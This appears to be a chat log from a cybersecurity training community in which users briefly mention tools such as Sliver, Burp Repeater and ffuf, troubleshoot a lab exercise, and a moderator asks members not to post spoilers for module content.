Sliver is one of the best C2s out there; it's free and open-source and you can customize it however you want.
Just tried and it still doesn't work.
Why not just do it from Repeater then?
What do you mean?
Get the flag from Repeater?
What would be the difference from doing it in your browser?
I don't know you told me to try it
@maiden field please refrain from posting spoilers to modules
It was marked as spoiler
Marking as spoiler doesn't matter.
People can still click the spoiler and see what you did.
Ok, so what am I supposed to do when asking for help if I can't say anything? Ask people to DM me? Anyway, people can find answers and walkthroughs online lol.
We ask that you report any spoilers for Tier I+ content you find to us via the /spoiler command.
He was referring to spoiler text/images.
If you really need to show images, redact anything that you may have had to discover/find,
i.e., endpoints or fuzzed pages.
I was referring to the last remark he made about finding answers and walkthroughs online.
OHHH my brain isn't there atm
Damn, you can fuzz multiple positions using ffuf.